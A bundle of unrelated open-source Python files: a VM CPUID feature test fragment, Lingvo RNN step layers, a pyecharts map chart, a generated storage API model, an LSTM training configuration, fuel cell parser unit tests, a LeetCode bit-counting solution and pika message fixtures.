"SSE4.1 extensions": "true",
"SSE4.2 extensions": "true",
"extended xAPIC support": "true",
"POPCNT instruction": "true",
"time stamp counter deadline": "true",
"XSAVE/XSTOR states": "true",
"OS-enabled XSAVE/XSTOR": "true",
"AVX: advanced vector extensions": "true",
"F16C half-precision convert instruction": "true",
"RDRAND instruction": "true",
"hypervisor guest status": "true",
# thermal_and_power_mgmt
"ARAT always running APIC timer": "true",
# extended_features
"FSGSBASE instructions": "true",
"IA32_TSC_ADJUST MSR supported": "true",
"SMEP supervisor mode exec protection": "true",
"enhanced REP MOVSB/STOSB": "true",
"SMAP: supervisor mode access prevention": "true",
# xsave_0xd_0
"XCR0 supported: x87 state": "true",
"XCR0 supported: SSE state": "true",
"XCR0 supported: AVX state": "true",
# xsave_0xd_1
"XSAVEOPT instruction": "true",
# extended_080000001_edx
"SYSCALL and SYSRET instructions": "true",
"64-bit extensions technology available": "true",
"execution disable": "true", "RDTSCP": "true",
# intel_080000001_ecx
"LAHF/SAHF supported in 64-bit mode": "true",
# adv_pwr_mgmt
"TscInvariant": "true"}
utils.check_guest_cpuid_output(test_microvm, "cpuid -1", None, '=',
enabled_list)
if cpu_template == "T2":
t2_enabled_features = {"FMA": "true", "BMI": "true", "BMI2": "true",
"AVX2": "true", "MOVBE": "true",
"INVPCID": "true"}
utils.check_guest_cpuid_output(test_microvm, "cpuid -1", None, '=',
t2_enabled_features)
|
the-stack_106_23833 | # Lint as: python2, python3
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Step APIs for RNN layers."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from lingvo import compat as tf
from lingvo.core import base_layer
from lingvo.core import py_utils
from lingvo.core import rnn_cell
from lingvo.core import step
from six.moves import range
class RnnStep(step.Step):
"""A step containing an RNNCell."""
@classmethod
def Params(cls):
p = super(RnnStep, cls).Params()
p.Define('cell', rnn_cell.LSTMCellSimple.Params(),
'Params for the RNN cell.')
return p
@base_layer.initializer
def __init__(self, params):
super(RnnStep, self).__init__(params)
p = params
with tf.variable_scope(p.name):
self.CreateChild('cell', p.cell)
def PrepareExternalInputs(self, theta, external_inputs):
"""Does not modify the external_inputs parameter.
This parameter, if provided, is assumed to be a vector that should be
concatenated with the other vectors in step_inputs.inputs.
Args:
theta: unused.
external_inputs: Either a tensor or None.
Returns:
external_inputs, unmodified.
"""
return external_inputs
def ZeroState(self, theta, prepared_inputs, batch_size):
"""Returns the zero_state for the RNN cell.
Args:
theta: Variables used by the RNNCell.
prepared_inputs: unused.
batch_size: An int scalar representing the batch size of per-step inputs.
Returns:
The zero state of the RNNCell.
"""
return self.cell.zero_state(theta.cell, batch_size)
def FProp(self, theta, prepared_inputs, step_inputs, padding, state0):
"""Performs one inference step on the RNN cell.
If external_inputs is not None, it is added as another act input
to the RNNCell.
Args:
theta: Variables used by the RNNCell.
prepared_inputs: If not None, concatenated with step_inputs.input. A
tensor of shape [batch_size, external_input_dim].
step_inputs: A NestedMap containing an 'input' list of [batch_size, dim]
where the sum of dim (including external_inputs) is
p.cell.num_input_nodes.
padding: A 0/1 float tensor of shape [batch_size]; 1.0 means that this
batch element is empty in this step.
state0: A NestedMap of state, either produced by ZeroState or a previous
invocation of FProp.
Returns:
(output, state1), where output is the cell output (GetOutput(state1))
of shape [batch_size, p.cell.num_output_nodes], and state1 is the cell's
recurrent state.
"""
cell_inputs = py_utils.NestedMap(act=step_inputs.inputs)
# An empty NestedMap can act as a None value here.
if prepared_inputs is not None and not isinstance(prepared_inputs,
py_utils.NestedMap):
cell_inputs.act.append(prepared_inputs)
cell_inputs.padding = padding
state1, extra = self.cell.FProp(theta.cell, state0, cell_inputs)
return py_utils.NestedMap(
output=self.cell.GetOutput(state1), extra=extra,
padding=padding), state1
class RnnStackStep(step.Step):
"""A stack of RnnSteps.
Three types of inputs are supported:
step_inputs.input: This is the standard input. It is expected to change
on every step of the sequence, and it is fed only to the first layer.
step_inputs.context: This input changes for each step of the sequence, but
is fed to every layer.
external_inputs: This input is fixed at the beginning of the sequence.
It is fed to every layer.
Residual connections are also supported. When residual_start >= 0, the output
of layer i (i >= residual_start) is added to the output of layer
i - residual_stride.
"""
@classmethod
def Params(cls):
"""Constructs Params for an RnnStackStep."""
p = super(RnnStackStep, cls).Params()
p.Define(
'rnn_cell_tpl', rnn_cell.LSTMCellSimple.Params(),
'RNNCell params template. '
'Can be a single param or '
'a list of rnn_layers params, one for each layer.')
p.Define(
'external_input_dim', 0, 'Size of the external input. '
'The external input is given at the start of the sequence '
'and is given to every layer at every step.')
p.Define(
'step_input_dim', 0, 'Size of the step input. '
'This input is only given to the first layer and is expected to '
'be different for each step.')
p.Define(
'context_input_dim', 0, 'Size of the context input. '
'This input is given to every layer and is expected to be '
'different for each step.')
p.Define(
'rnn_cell_dim', 0, 'Size of the rnn cells. '
'This may be overridden by parameters set in rnn_cell_tpl.')
p.Define(
'rnn_cell_hidden_dim', 0, 'internal size of the rnn cells. When '
'set to > 0 it enables a projection layer at the output of the '
'rnn cell. This may be overridden by parameters set in rnn_cell_tpl.')
p.Define('rnn_layers', 1, 'Number of rnn layers.')
p.Define(
'residual_start', -1,
'Start residual connections from this layer. For this and higher '
'layers, the layer output is the sum of the RNN cell output and '
'input; if the layer also normalizes its output, then the '
'normalization is done over this sum. Set to -1 to disable '
'residual connections.')
p.Define('residual_stride', 1,
'Number of lstm layers to skip per residual connection.')
return p
@base_layer.initializer
def __init__(self, params):
super(RnnStackStep, self).__init__(params)
p = params
sub = []
# Users can either provide a single rnn_cell_tpl or one per layer.
# If only one is provided, we replicate it for each layer.
rnn_cell_tpls = p.rnn_cell_tpl
if not isinstance(rnn_cell_tpls, list):
rnn_cell_tpls = [p.rnn_cell_tpl] * p.rnn_layers
# We may provide up to three tensors as input to the RnnStep:
# the normal input, the context input (from step_inputs.context),
# and the external input (from external_inputs).
arity = 1
if p.context_input_dim:
arity += 1
if p.external_input_dim:
arity += 1
extra_dim = p.context_input_dim + p.external_input_dim
# The first layer's input comes from step_inputs.input. Later layers
# will get their inputs from the previous layer's output.
input_nodes = p.step_input_dim
for i in range(p.rnn_layers):
step_i = RnnStep.Params()
step_i.name = 'rnn_%d' % (i)
step_i.cell = rnn_cell_tpls[i].Copy()
step_i.cell.num_input_nodes = input_nodes + extra_dim
step_i.cell.inputs_arity = arity
# The dimensions of each cell may be specified in the cell template
# but most users will specify them in the stack params.
if step_i.cell.num_output_nodes == 0:
step_i.cell.num_output_nodes = p.rnn_cell_dim
if step_i.cell.num_hidden_nodes == 0:
step_i.cell.num_hidden_nodes = p.rnn_cell_hidden_dim
input_nodes = step_i.cell.num_output_nodes
sub.append(step_i)
stack_params = step.StackStep.Params()
stack_params.name = p.name
stack_params.sub = sub
stack_params.residual_start = p.residual_start
stack_params.residual_stride = p.residual_stride
self.CreateChild('stack', stack_params)
def PrepareExternalInputs(self, theta, external_inputs):
"""Delegates external inputs preparation to sub-layers.
Args:
theta: A `.NestedMap` object containing weight values of this layer and
its children layers.
external_inputs: A `.NestedMap` object. The structure of the internal
fields is defined by the sub-steps.
Returns:
A `.NestedMap` containing a pre-processed version of the external_inputs,
one per sub-step.
"""
return self.stack.PrepareExternalInputs(theta.stack, external_inputs)
def ZeroState(self, theta, prepared_inputs, batch_size):
"""Computes a zero state for each sub-step.
Args:
theta: A `.NestedMap` object containing weight values of this layer and
its children layers.
prepared_inputs: An output from PrepareExternalInputs.
batch_size: The number of items in the batch that FProp will process.
Returns:
A `.NestedMap` containing a state0 object for each sub-step.
"""
return self.stack.ZeroState(theta.stack, prepared_inputs, batch_size)
def FProp(self, theta, prepared_inputs, step_inputs, padding, state0):
"""Performs inference on the stack of sub-steps.
See the documentation for StackStep for the particulars of passing context
information to layers.
Args:
theta: A `.NestedMap` object containing weight values of this layer and
its children layers.
prepared_inputs: An output from PrepareExternalInputs.
step_inputs: A `.NestedMap` containing a list called 'inputs', an
optionally a tensor called 'context'.
padding: A 0/1 float tensor of shape [batch_size]; 1.0 means that this
batch element is empty in this step.
state0: The previous recurrent state.
Returns:
(output, state1):
- output: A `.NestedMap` containing the output of the top-most step.
- state1: The recurrent state to feed to next invocation of this graph.
"""
return self.stack.FProp(theta.stack, prepared_inputs, step_inputs, padding,
state0)
|
the-stack_106_23834 | # coding=utf-8
from pyecharts.chart import Chart
class Map(Chart):
"""
<<< 地图 >>>
地图主要用于地理区域数据的可视化。
"""
def __init__(self, title="", subtitle="", **kwargs):
super(Map, self).__init__(title, subtitle, **kwargs)
def add(self, *args, **kwargs):
self.__add(*args, **kwargs)
def __add(
self,
name,
attr,
value,
maptype="china",
is_roam=True,
is_map_symbol_show=True,
name_map=None,
**kwargs
):
"""
:param name:
系列名称,用于 tooltip 的显示,legend 的图例筛选。
:param attr:
属性名称。
:param value:
属性所对应的值。
:param maptype:
地图类型。 从 v0.3.2+ 起,地图已经变为扩展包,支持全国省份,全国城市,全国区县,
全球国家等地图,具体请参考 [地图自定义篇](zh-cn/customize_map)
:param is_roam:
是否开启鼠标缩放和平移漫游。默认为 True
如果只想要开启缩放或者平移,可以设置成'scale'或者'move'。设置成 True 为都开启。
:param is_map_symbol_show:
是否显示地图标记红点,默认为 True。
:param name_map:
用自定义的地图名称。默认为 None,也就是用地图自带地名。
:param kwargs:
"""
assert len(attr) == len(value)
chart = self._get_all_options(**kwargs)
_data = []
for data in zip(attr, value):
_name, _value = data
_data.append({"name": _name, "value": _value})
self._option.get("legend")[0].get("data").append(name)
__option__ = {
"type": "map",
"name": name,
"symbol": chart["symbol"],
"label": chart["label"],
"mapType": maptype,
"data": _data,
"roam": is_roam,
"showLegendSymbol": is_map_symbol_show,
}
if name_map:
__option__["nameMap"] = name_map
self._option.get("series").append(__option__)
self._add_chinese_map(maptype)
self._config_components(**kwargs)
|
the-stack_106_23835 | # coding: utf-8
"""
Pure Storage FlashBlade REST 1.9 Python SDK
Pure Storage FlashBlade REST 1.9 Python SDK, developed by [Pure Storage, Inc](http://www.purestorage.com/). Documentations can be found at [purity-fb.readthedocs.io](http://purity-fb.readthedocs.io/).
OpenAPI spec version: 1.9
Contact: [email protected]
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
class PureArray(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
#BEGIN_CUSTOM
# IR-51527: Prevent Pytest from attempting to collect this class based on name.
__test__ = False
#END_CUSTOM
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'name': 'str',
'id': 'str',
'ntp_servers': 'list[str]',
'os': 'str',
'revision': 'str',
'time_zone': 'str',
'version': 'str'
}
attribute_map = {
'name': 'name',
'id': 'id',
'ntp_servers': 'ntp_servers',
'os': 'os',
'revision': 'revision',
'time_zone': 'time_zone',
'version': 'version'
}
def __init__(self, name=None, id=None, ntp_servers=None, os=None, revision=None, time_zone=None, version=None): # noqa: E501
"""PureArray - a model defined in Swagger""" # noqa: E501
self._name = None
self._id = None
self._ntp_servers = None
self._os = None
self._revision = None
self._time_zone = None
self._version = None
self.discriminator = None
if name is not None:
self.name = name
if id is not None:
self.id = id
if ntp_servers is not None:
self.ntp_servers = ntp_servers
if os is not None:
self.os = os
if revision is not None:
self.revision = revision
if time_zone is not None:
self.time_zone = time_zone
if version is not None:
self.version = version
@property
def name(self):
"""Gets the name of this PureArray. # noqa: E501
The name of the object # noqa: E501
:return: The name of this PureArray. # noqa: E501
:rtype: str
"""
return self._name
@name.setter
def name(self, name):
"""Sets the name of this PureArray.
The name of the object # noqa: E501
:param name: The name of this PureArray. # noqa: E501
:type: str
"""
self._name = name
@property
def id(self):
"""Gets the id of this PureArray. # noqa: E501
A globally unique ID chosen by the system. Cannot change. Cannot ever refer to another resource. # noqa: E501
:return: The id of this PureArray. # noqa: E501
:rtype: str
"""
return self._id
@id.setter
def id(self, id):
"""Sets the id of this PureArray.
A globally unique ID chosen by the system. Cannot change. Cannot ever refer to another resource. # noqa: E501
:param id: The id of this PureArray. # noqa: E501
:type: str
"""
self._id = id
@property
def ntp_servers(self):
"""Gets the ntp_servers of this PureArray. # noqa: E501
:return: The ntp_servers of this PureArray. # noqa: E501
:rtype: list[str]
"""
return self._ntp_servers
@ntp_servers.setter
def ntp_servers(self, ntp_servers):
"""Sets the ntp_servers of this PureArray.
:param ntp_servers: The ntp_servers of this PureArray. # noqa: E501
:type: list[str]
"""
self._ntp_servers = ntp_servers
@property
def os(self):
"""Gets the os of this PureArray. # noqa: E501
Possible values are Purity//FA and Purity//FB. # noqa: E501
:return: The os of this PureArray. # noqa: E501
:rtype: str
"""
return self._os
@os.setter
def os(self, os):
"""Sets the os of this PureArray.
Possible values are Purity//FA and Purity//FB. # noqa: E501
:param os: The os of this PureArray. # noqa: E501
:type: str
"""
self._os = os
@property
def revision(self):
"""Gets the revision of this PureArray. # noqa: E501
:return: The revision of this PureArray. # noqa: E501
:rtype: str
"""
return self._revision
@revision.setter
def revision(self, revision):
"""Sets the revision of this PureArray.
:param revision: The revision of this PureArray. # noqa: E501
:type: str
"""
self._revision = revision
@property
def time_zone(self):
"""Gets the time_zone of this PureArray. # noqa: E501
:return: The time_zone of this PureArray. # noqa: E501
:rtype: str
"""
return self._time_zone
@time_zone.setter
def time_zone(self, time_zone):
"""Sets the time_zone of this PureArray.
:param time_zone: The time_zone of this PureArray. # noqa: E501
:type: str
"""
self._time_zone = time_zone
@property
def version(self):
"""Gets the version of this PureArray. # noqa: E501
:return: The version of this PureArray. # noqa: E501
:rtype: str
"""
return self._version
@version.setter
def version(self, version):
"""Sets the version of this PureArray.
:param version: The version of this PureArray. # noqa: E501
:type: str
"""
self._version = version
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(PureArray, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, PureArray):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
|
the-stack_106_23836 | from data.input_set import InputSet
from data.point import Point
class Configuration(object):
def __init__(self):
"""
path params
"""
self.PATH = "/home/alex/Documents/Project/data/FRAME_DATABASES"
self.PATH_LABELS = "/home/alex/Documents/Project/LSTM_labels/tiles"
self.DATA_SET_PATH = "../data"
self.OUTPUT_PATH = '/media/alex/Локальный диск/UBUNTU/runs/'
self.MAP_PATH = ''
"""
dataset params
"""
self.NORM_RANGE = (0, 1)
class TileType(object):
def __init__(self):
self.A = 'A'
self.B = 'B'
self.C = 'C'
self.D = 'D'
self.E = 'E'
pass
self.TILE_TYPE = TileType()
self.TILE_1_NUMBER_OF_EXAMPLES = 3618
self.TILE_1_A = InputSet(1, 465, Point(1.11, 5.68), Point(1.11, 7.69), self.TILE_TYPE.A) # y change
self.TILE_1_B = InputSet(466, 1090, Point(1.11, 7.69), Point(3.41, 7.69), self.TILE_TYPE.B) # x change
self.TILE_1_C = InputSet(1091, 2330, Point(3.41, 7.69), Point(3.41, 0.54), self.TILE_TYPE.C) # y change
self.TILE_1_D = InputSet(2331, 2700, Point(3.41, 0.54), Point(1.11, 0.54), self.TILE_TYPE.D) # x change
self.TILE_1_E = InputSet(2701, 3618, Point(1.11, 0.54), Point(1.11, 5.68), self.TILE_TYPE.E) # y change
self.TILE_2_NUMBER_OF_EXAMPLES = 3579
self.TILE_2_A = InputSet(1, 510, Point(1.11, 5.68), Point(1.11, 7.69), self.TILE_TYPE.A) # y change
self.TILE_2_B = InputSet(511, 1150, Point(1.11, 7.69), Point(3.41, 7.69), self.TILE_TYPE.B) # x change
self.TILE_2_C = InputSet(1151, 2370, Point(3.41, 7.69), Point(3.41, 0.54), self.TILE_TYPE.C) # y change
self.TILE_2_D = InputSet(2371, 2760, Point(3.41, 0.54), Point(1.11, 0.54), self.TILE_TYPE.D) # x change
self.TILE_2_E = InputSet(2761, 3579, Point(1.11, 0.54), Point(1.11, 5.68), self.TILE_TYPE.E) # y change
self.TILE_3_NUMBER_OF_EXAMPLES = 3380
self.TILE_3_A = InputSet(1, 430, Point(1.11, 5.68), Point(1.11, 7.69), self.TILE_TYPE.A) # y change
self.TILE_3_B = InputSet(431, 960, Point(1.11, 7.69), Point(3.41, 7.69), self.TILE_TYPE.B) # x change
self.TILE_3_C = InputSet(961, 2160, Point(3.41, 7.69), Point(3.41, 0.54), self.TILE_TYPE.C) # y change
self.TILE_3_D = InputSet(2161, 2540, Point(3.41, 0.54), Point(1.11, 0.54), self.TILE_TYPE.D) # x change
self.TILE_3_E = InputSet(2541, 3380, Point(1.11, 0.54), Point(1.11, 5.68), self.TILE_TYPE.E) # y change
self.TILE_4_NUMBER_OF_EXAMPLES = 3223
self.TILE_4_A = InputSet(1, 410, Point(1.11, 5.68), Point(1.11, 7.69), self.TILE_TYPE.A) # y change
self.TILE_4_B = InputSet(411, 910, Point(1.11, 7.69), Point(3.41, 7.69), self.TILE_TYPE.B) # x change
self.TILE_4_C = InputSet(911, 2080, Point(3.41, 7.69), Point(3.41, 0.54), self.TILE_TYPE.C) # y change
self.TILE_4_D = InputSet(2081, 2430, Point(3.41, 0.54), Point(1.11, 0.54), self.TILE_TYPE.D) # x change
self.TILE_4_E = InputSet(2431, 3223, Point(1.11, 0.54), Point(1.11, 5.68), self.TILE_TYPE.E) # y change
self.TILE_5_NUMBER_OF_EXAMPLES = 3068
self.TILE_5_A = InputSet(1, 400, Point(1.11, 5.68), Point(1.11, 7.69), self.TILE_TYPE.A) # y change
self.TILE_5_B = InputSet(401, 910, Point(1.11, 7.69), Point(3.41, 7.69), self.TILE_TYPE.B) # x change
self.TILE_5_C = InputSet(911, 1960, Point(3.41, 7.69), Point(3.41, 0.54), self.TILE_TYPE.C) # y change
self.TILE_5_D = InputSet(1961, 2320, Point(3.41, 0.54), Point(1.11, 0.54), self.TILE_TYPE.D) # x change
self.TILE_5_E = InputSet(2321, 3068, Point(1.11, 0.54), Point(1.11, 5.68), self.TILE_TYPE.E) # y change
self.TILE_6_NUMBER_OF_EXAMPLES = 2973
self.TILE_6_A = InputSet(1, 410, Point(1.11, 5.68), Point(1.11, 7.69), self.TILE_TYPE.A) # y change
self.TILE_6_B = InputSet(411, 910, Point(1.11, 7.69), Point(3.41, 7.69), self.TILE_TYPE.B) # x change
self.TILE_6_C = InputSet(911, 1930, Point(3.41, 7.69), Point(3.41, 0.54), self.TILE_TYPE.C) # y change
self.TILE_6_D = InputSet(1931, 2270, Point(3.41, 0.54), Point(1.11, 0.54), self.TILE_TYPE.D) # x change
self.TILE_6_E = InputSet(2271, 2973, Point(1.11, 0.54), Point(1.11, 5.68), self.TILE_TYPE.E) # y change
self.TILE_7_NUMBER_OF_EXAMPLES = 2930
self.TILE_7_A = InputSet(1, 370, Point(1.11, 5.68), Point(1.11, 7.69), self.TILE_TYPE.A) # y change
self.TILE_7_B = InputSet(371, 830, Point(1.11, 7.69), Point(3.41, 7.69), self.TILE_TYPE.B) # x change
self.TILE_7_C = InputSet(831, 1875, Point(3.41, 7.69), Point(3.41, 0.54), self.TILE_TYPE.C) # y change
self.TILE_7_D = InputSet(1876, 2200, Point(3.41, 0.54), Point(1.11, 0.54), self.TILE_TYPE.D) # x change
self.TILE_7_E = InputSet(2201, 2930, Point(1.11, 0.54), Point(1.11, 5.68), self.TILE_TYPE.E) # y change
"""
input images params
"""
class Size(object):
def __init__(self, width, height, channels):
self.WIDTH = width
self.HEIGHT = height
self.CHANNELS = channels
pass
self.IMAGE_SIZE = Size(268, 32, 3)
"""
modes params
"""
class Mode(object):
def __init__(self):
self.TRAINING = 'training'
self.VALIDATION = 'validation'
self.TESTING = 'testing'
pass
self.MODE = Mode()
"""
model params
"""
self.LEAKY_RELU_ALPHA = 0.1
self.LSTM_HIDDEN_UNITS = 512
self.LSTM_LAYERS = 2
"""
training params
"""
self.BATCH_SIZE = 100 # SEQUENCE_LENGTH
self.EPOCHS = 100000
self.LOG_PERIOD = 10 # steps
self.SAVE_PERIOD = 1000 # steps
self.MIN_FRACTION_OF_EXAMPLES_IN_QUEUE = 0.4
self.NUM_PREPROCESSING_THREADS = 16
self.NUM_EPOCHS_PER_DECAY = 1000 # Epochs after which learning rate decays.
self.INITIAL_LEARNING_RATE = 0.001
self.LEARNING_RATE_DECAY_FACTOR = 0.1
self.TARGET_LOSS = 0.001
"""
testing params
"""
self.TESTING_BATCH_SIZE = self.BATCH_SIZE # SEQUENCE_LENGTH
self.TESTING_EPOCHS = 1
self.VALIDATION_PERC = 0.2
self.TESTING_PERC = 0.1
self.TRAINING_PERC = 1 - self.VALIDATION_PERC - self.TESTING_PERC
pass
|
the-stack_106_23837 | #!/usr/bin/env python
"""
@package mi.dataset.parser.test
@file mi-dataset/mi/dataset/parser/test/test_fuelcell_eng_dcl.py
@author Chris Goodrich
@brief Test code for the fuelcell_eng_dcl parser
Release notes:
initial release
"""
__author__ = 'cgoodrich'
from mi.logging import log
import os
from nose.plugins.attrib import attr
from mi.core.exceptions import ConfigurationException
from mi.dataset.test.test_parser import ParserUnitTestCase
from mi.dataset.dataset_parser import DataSetDriverConfigKeys
from mi.dataset.parser.fuelcell_eng_dcl import FuelCellEngDclParticleClassKey,\
FuelCellEngDclDataParticleRecovered,\
FuelCellEngDclDataParticleTelemetered
from mi.dataset.parser.fuelcell_eng_dcl import FuelCellEngDclParser
from mi.idk.config import Config
RESOURCE_PATH = os.path.join(Config().base_dir(),
'mi', 'dataset', 'driver', 'fuelcell_eng', 'dcl', 'resource')
@attr('UNIT', group='mi')
class FuelCellEngDclParserUnitTestCase(ParserUnitTestCase):
"""
fuelcell_eng_dcl Parser unit test suite
"""
def setUp(self):
ParserUnitTestCase.setUp(self)
self._recovered_parser_config = {
DataSetDriverConfigKeys.PARTICLE_MODULE: 'mi.dataset.parser.fuelcell_eng_dcl',
DataSetDriverConfigKeys.PARTICLE_CLASS: None,
DataSetDriverConfigKeys.PARTICLE_CLASSES_DICT: {
FuelCellEngDclParticleClassKey.ENGINEERING_DATA_PARTICLE_CLASS: FuelCellEngDclDataParticleRecovered
}
}
self._telemetered_parser_config = {
DataSetDriverConfigKeys.PARTICLE_MODULE: 'mi.dataset.parser.fuelcell_eng_dcl',
DataSetDriverConfigKeys.PARTICLE_CLASS: None,
DataSetDriverConfigKeys.PARTICLE_CLASSES_DICT: {
FuelCellEngDclParticleClassKey.ENGINEERING_DATA_PARTICLE_CLASS: FuelCellEngDclDataParticleTelemetered
}
}
self._incomplete_parser_config = {
DataSetDriverConfigKeys.PARTICLE_MODULE: 'mi.dataset.parser.fuelcell_eng_dcl',
DataSetDriverConfigKeys.PARTICLE_CLASS: None
}
self._bad_parser_config = {
DataSetDriverConfigKeys.PARTICLE_MODULE: 'mi.dataset.parser.fuelcell_eng_dcl',
DataSetDriverConfigKeys.PARTICLE_CLASS: None,
DataSetDriverConfigKeys.PARTICLE_CLASSES_DICT: {}
}
def test_simple(self):
"""
Read file and verify that all expected particles can be read.
Verify that the contents of the particles are correct.
This is the happy path.
"""
log.debug('===== START TEST SIMPLE =====')
num_particles_to_request = 25
num_expected_particles = 20
# Test the recovered version
log.debug('------ RECOVERED ------')
with open(os.path.join(RESOURCE_PATH, '20141207s.pwrsys.log'), 'rU') as file_handle:
parser = FuelCellEngDclParser(self._recovered_parser_config,
file_handle,
self.exception_callback)
particles = parser.get_records(num_particles_to_request)
self.assertEquals(len(particles), num_expected_particles)
self.assert_particles(particles, 'recovered_20141207s.pwrsys.yml', RESOURCE_PATH)
# Test the telemetered version
log.debug('----- TELEMETERED -----')
with open(os.path.join(RESOURCE_PATH, '20141207s.pwrsys.log'), 'rU') as file_handle:
parser = FuelCellEngDclParser(self._telemetered_parser_config,
file_handle,
self.exception_callback)
particles = parser.get_records(num_particles_to_request)
self.assertEquals(len(particles), num_expected_particles)
self.assert_particles(particles, 'telemetered_20141207s.pwrsys.yml', RESOURCE_PATH)
log.debug('===== END TEST SIMPLE =====')
def test_bigfile(self):
"""
Read file and verify that all expected particles can be read.
Verify that the expected number of particles are produced.
Only one test is run as the content of the input files is the
same for recovered or telemetered.
"""
log.debug('===== START TEST BIGFILE =====')
num_particles_to_request = num_expected_particles = 870
with open(os.path.join(RESOURCE_PATH, '20141207.pwrsys.log'), 'rU') as file_handle:
parser = FuelCellEngDclParser(self._recovered_parser_config,
file_handle,
self.exception_callback)
particles = parser.get_records(num_particles_to_request)
self.assertEquals(len(particles), num_expected_particles)
log.debug('===== END TEST BIGFILE =====')
def test_bad_checksum(self):
"""
Read file and verify that all expected particles can be read.
There are two lines with bad checksums in the file. The checksum
after the colon is incorrect on lines 10 and 23 of the input file.
Only one test is run as the content of the input files is the
same for recovered or telemetered.
"""
log.debug('===== START TEST BAD CHECKSUM =====')
num_particles_to_request = num_expected_particles = 18
with open(os.path.join(RESOURCE_PATH, '20141207s_bcs.pwrsys.log'), 'rU') as file_handle:
parser = FuelCellEngDclParser(self._recovered_parser_config,
file_handle,
self.exception_callback)
particles = parser.get_records(num_particles_to_request)
self.assertEquals(len(particles), num_expected_particles)
log.debug('===== END TEST BAD CHECKSUM =====')
def test_badly_formed(self):
"""
Read file and verify that all expected particles can be read.
Line 1 Improperly formatted - No particle generated
Line 2 Improperly formatted - No particle generated
Line 9 - Bad checksum - No particle generated
No fuel cell data present on line 11 - No particle generated
No fuel cell data present on line 12 - No particle generated
No fuel cell data present on line 13 - No particle generated
No fuel cell data present on line 14 - No particle generated
No fuel cell data present on line 15 - No particle generated
Line 20 - Bad checksum - No particle generated
Line 24 Improperly formatted - No particle generated
Line 26 Improperly formatted - No particle generated
Line 27 Improperly formatted - No particle generated
Line 28 Bad/Missing Timestamp - No particle generated
Line 29 Bad/Missing Timestamp - No particle generated
Line 30 No data found - No particle generated
Line 31 No terminator found - No particle generated
Line 32 Improper format - No particle generated
Only one test is run as the content of the input files
is the same for recovered or telemetered.
"""
log.debug('===== START TEST BADLY FORMED =====')
num_particles_to_request = 33
num_expected_particles = 16
with open(os.path.join(RESOURCE_PATH, '20141207_badform.pwrsys.log'), 'rU') as file_handle:
parser = FuelCellEngDclParser(self._recovered_parser_config,
file_handle,
self.exception_callback)
particles = parser.get_records(num_particles_to_request)
self.assertEquals(len(particles), num_expected_particles)
log.debug('===== END TEST BADLY FORMED =====')
def test_bad_configuration(self):
"""
Attempt to build a parser with a bad configuration.
"""
log.debug('===== START TEST BAD CONFIGURATION =====')
with open(os.path.join(RESOURCE_PATH, '20141207s.pwrsys.log'), 'rU') as file_handle:
with self.assertRaises(ConfigurationException):
parser = FuelCellEngDclParser(self._bad_parser_config,
file_handle,
self.exception_callback)
log.debug('===== END TEST BAD CONFIGURATION =====')
def test_partial_configuration(self):
"""
Attempt to build a parser with a bad configuration.
"""
log.debug('===== START TEST PARTIAL CONFIGURATION =====')
with open(os.path.join(RESOURCE_PATH, '20141207s.pwrsys.log'), 'rU') as file_handle:
with self.assertRaises(ConfigurationException):
parser = FuelCellEngDclParser(self._incomplete_parser_config,
file_handle,
self.exception_callback)
log.debug('===== END TEST PARTIAL CONFIGURATION =====')
def test_blank_line(self):
"""
Read file and verify that all expected particles can be read.
Verify that the contents of the particles are correct. There are
blank lines interspersed in the file. This test verifies that
these blank lines do not adversely affect the parser. Only one
test is run as the content of the input files is the same for
recovered or telemetered.
"""
log.debug('===== START TEST BLANK LINE =====')
num_particles_to_request = 25
num_expected_particles = 20
with open(os.path.join(RESOURCE_PATH, '20141207sbl.pwrsys.log'), 'rU') as file_handle:
parser = FuelCellEngDclParser(self._recovered_parser_config,
file_handle,
self.exception_callback)
particles = parser.get_records(num_particles_to_request)
self.assertEquals(len(particles), num_expected_particles)
log.debug('===== END TEST BLANK LINE =====')
|
the-stack_106_23838 | ## https://leetcode.com/problems/counting-bits/
## for every number between 0 and N, count up the
## number of 1-bits in that number. I briefly tried
## writing this up more intelligently by iterating
## a number in binary up to N, but it wasn't quite
## working and it turns out the simple way (using
## built in base conversion) is fast enoguh (25th
## percentile in runtime and 64rd in memory).
class Solution:
def add_one_to_binary(self, num):
return f'{int(num, 2) + 1:b}'
def countBits(self, num: int) -> List[int]:
number = '0'
output = [0]
for ii in range(1, num+1):
number = self.add_one_to_binary(number)
output.append(number.count('1'))
return output |
the-stack_106_23840 | import mock
from pika import spec
from pika import frame
import time
CHANNEL = mock.Mock('pika.channel.Channel')
METHOD = spec.Basic.Deliver('ctag0', 1, False, 'exchange', 'routing_key')
PROPERTIES = spec.BasicProperties(content_type='application/json',
content_encoding='qux',
headers={'foo': 'bar', 'baz': 1},
delivery_mode=2,
priority=5,
correlation_id='c123',
reply_to='rtrk',
expiration='32768',
message_id='mid123',
timestamp=time.time(),
type='test',
user_id='foo',
app_id='bar')
